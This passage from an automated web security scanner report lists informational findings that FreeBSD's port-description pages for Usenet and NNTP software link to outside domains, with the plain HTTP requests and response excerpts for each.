via NNTP or mailing via a sendmail-workalike.

WWW: <A HREF="http://www.erlenstar.demon.co.uk/perl/">http://www.erlenstar.demon.co.uk/perl/</A>
...[SNIP]...

20.629. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/p5-POE-Component-Client-NNTP/pkg-descr
The response contains the following links to other domains:
  • http://search.cpan.org/dist/POE-Component-Client-NNTP/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/p5-POE-Component-Client-NNTP/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:23 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
POE::Component::Client::NNTP is a POE component that provides
non-blocking NNTP access to other components and sessions.

WWW: <A HREF="http://search.cpan.org/dist/POE-Component-Client-NNTP/">http://search.cpan.org/dist/POE-Component-Client-NNTP/</A>
...[SNIP]...

20.630. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/openftd/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.ftd.nu/
  • http://www.ftd4linux.nl/

Request

GET /cgi/url.cgi?ports/news/openftd/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:14 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
Fill Threads Database is a dutch Usenet binaries grabber.
OpenFTD is the open source implementation of it.

Use the "ftd" program to start the gui.

WWW: <A HREF="http://www.ftd4linux.nl/">http://www.ftd4linux.nl/</A>
WWW: <A HREF="http://www.ftd.nu/">http://www.ftd.nu/</A>
...[SNIP]...

20.631. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/pyne/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.soul-less.pwp.blueyonder.co.uk/pyne/

Request

GET /cgi/url.cgi?ports/news/pyne/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:30 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
Pyne is an X11 offline Newsreader/Emailer using the GTK+ toolkit.

WWW: <A HREF="http://www.soul-less.pwp.blueyonder.co.uk/pyne/">http://www.soul-less.pwp.blueyonder.co.uk/pyne/</A>
...[SNIP]...

20.632. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/leafnode/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.leafnode.org/

Request

GET /cgi/url.cgi?ports/news/leafnode/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:56 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
wnloaded based on what's accessed.
Use it to enable online newsreaders to offline reading or to reduce your
external bandwidth if you have several users accessing Usenet news.

-- Matthias Andree
WWW: <A HREF="http://www.leafnode.org/">http://www.leafnode.org/</A>
...[SNIP]...

20.633. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/diablo/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.openusenet.org/diablo/

Request

GET /cgi/url.cgi?ports/news/diablo/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:30 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
that was originally developed by Matthew Dillon and is now run as an open
source project. Diablo is significantly faster and more robust than INN,
and scales well to multi-server installations.

WWW: <A HREF="http://www.openusenet.org/diablo/">http://www.openusenet.org/diablo/</A>
...[SNIP]...

20.634. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/noffle/pkg-descr
The response contains the following links to other domains:
  • http://noffle.sourceforge.net/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/noffle/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:12 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
on the local host, but gets its news
feed by acting as a client to a remote server. Allows reading
news offline with many news clients, even if they do not
support offline reading by themselves.

WWW: <A HREF="http://noffle.sourceforge.net">http://noffle.sourceforge.net</A>
...[SNIP]...

20.635. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/husky-base/pkg-descr
The response contains the following links to other domains:
  • http://husky.sourceforge.net/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/husky-base/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:36 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
Common files for Husky Fidosoft Project.

Husky is complete freeware suite of Fidonet applications.

WWW: <A HREF="http://husky.sourceforge.net/">http://husky.sourceforge.net/</A>
...[SNIP]...

20.636. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/hellanzb/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.hellanzb.com/

Request

GET /cgi/url.cgi?ports/news/hellanzb/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:35 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
-free as
possible. Once fully installed, all that's required is moving an nzb file to the
queue directory. The rest: downloading, par-checking, un-raring, etc. is done
automatically by hellanzb.

WWW: <A HREF="http://www.hellanzb.com">http://www.hellanzb.com</A>
...[SNIP]...

20.637. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/newspost/pkg-descr
The response contains the following links to other domains:
  • http://newspost.unixcab.org/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/newspost/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:07 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
l-featured USEnet binary autoposter. It is meant as
an all-in-one posting solution. In addition to posting files, it can
post text prefixes, and generate and post .SFV files and .PAR volumes.

WWW:        <A HREF="http://newspost.unixcab.org/">http://newspost.unixcab.org/</A>
...[SNIP]...

20.638. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/p5-News-Article-NoCeM/pkg-descr
The response contains the following links to other domains:
  • http://search.cpan.org/dist/News-Article-NoCeM/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/p5-News-Article-NoCeM/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:17 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
News::Article::NoCeM is a library of perl modules for managing NoCeM notice in
Network News services. It's meant to be used for code-reuse and sharing when
writing news-based applications.

WWW: <A HREF="http://search.cpan.org/dist/News-Article-NoCeM/">http://search.cpan.org/dist/News-Article-NoCeM/</A>
...[SNIP]...

20.639. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/grn/pkg-descr
The response contains the following links to other domains:
  • http://grn.sourceforge.net/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/grn/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:34 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
Grn also uses pthreads to allow the user to interact with the program during
different time-consuming tasks (such as fetching grouplist or threading
articles - these all run in another thread).

WWW: <A HREF="http://grn.sourceforge.net/">http://grn.sourceforge.net/</A>
...[SNIP]...

20.640. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/ifmail/pkg-descr
The response contains the following links to other domains:
  • http://ifmail.sourceforge.net/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/ifmail/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:53 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
rts Fidonet net- and
echomail to RFC-822/RFC-1036 compliant mail and news
and vice versa. In cooperation with MTA and netnews
packages allows to run a FidoNet node (or point) on
a UN*X machine.

WWW: <A HREF="http://ifmail.sourceforge.net/">http://ifmail.sourceforge.net/</A>
...[SNIP]...

20.641. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/cg/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.nih.at/cg/

Request

GET /cgi/url.cgi?ports/news/cg/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:18 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
A semi-automatic newsgroup binary downloader. It assembles parts based
on subject headers and then offers them in an editor for the user to
choose which files he really wants.

WWW: <A HREF="http://www.nih.at/cg/">http://www.nih.at/cg/</A>
...[SNIP]...

20.642. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/newscache/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.linuxhacker.at/newscache/

Request

GET /cgi/url.cgi?ports/news/newscache/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:02 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
is sent directly to its client. Otherwise,
the article is requested from the upstream news server, stored in the
cache area and sent back to the client.

Author: Thomas Gschwind, Herber Straub
WWW:    <A HREF="http://www.linuxhacker.at/newscache/">http://www.linuxhacker.at/newscache/</A>
...[SNIP]...

20.643. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/german/unix-connect/pkg-descr
The response contains the following links to other domains:
  • http://sourceforge.net/projects/unix-connect/
  • http://www.dinoex.de/unix-connect.html
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/german/unix-connect/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:26 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
</A>
WWW: <A HREF="http://www.dinoex.de/unix-connect.html">http://www.dinoex.de/unix-connect.html</A>
WWW: <A HREF="http://sourceforge.net/projects/unix-connect/">http://sourceforge.net/projects/unix-connect/</A>
...[SNIP]...

20.644. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/p5-POE-Component-Server-NNTP/pkg-descr
The response contains the following links to other domains:
  • http://search.cpan.org/dist/POE-Component-Server-NNTP/
  • http://www.faqs.org/rfcs/rfc977.html
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/p5-POE-Component-Server-NNTP/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:23 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
POE::Component::Server::NNTP is a POE component that implements an RFC 977
<A HREF="http://www.faqs.org/rfcs/rfc977.html">http://www.faqs.org/rfcs/rfc977.html</A>
...[SNIP]...
se and process the commands given and send back applicable NNTP
responses.

This component doesn't implement the news database and as such is not by itself
a complete NNTP daemon implementation.

WWW:    <A HREF="http://search.cpan.org/dist/POE-Component-Server-NNTP/">http://search.cpan.org/dist/POE-Component-Server-NNTP/</A>
...[SNIP]...

20.645. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/sabnzbdplus/pkg-descr
The response contains the following links to other domains:
  • http://sabnzbd.org/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/sabnzbdplus/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:31 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
loading
from Usenet easy by automating the whole thing. You give it an NZB
file or an RSS feed, it does the rest. Has a web-browser based UI
and an API for 3rd-party apps. Ideal for servers too.

WWW: <A HREF="http://sabnzbd.org/">http://sabnzbd.org/</A>
...[SNIP]...

20.646. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/nn/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.nndev.org/

Request

GET /cgi/url.cgi?ports/news/nn/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:10 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
No News is good news. This version of nn has NOV support.

WWW: <A HREF="http://www.nndev.org/">http://www.nndev.org/</A>
...[SNIP]...

20.647. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/py-twistedNews/pkg-descr
The response contains the following links to other domains:
  • http://twistedmatrix.com/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/news/py-twistedNews/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:28 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
cts stored directly on
the filesystem for message storage. Twisted News also has very rudamentary
support for moderated groups.

Twisted News is available under the MIT Free Software licence.

WWW: <A HREF="http://twistedmatrix.com/">http://twistedmatrix.com/</A>
...[SNIP]...

20.648. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/s-news/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.lost.org.uk/snews.html

Request

GET /cgi/url.cgi?ports/news/s-news/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:30 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
how long they have been in the spool.
It has NNTP access configuration to allow and deny read, post and transfer
access to remote hosts.
It is very light weight and relatively easy to configure.

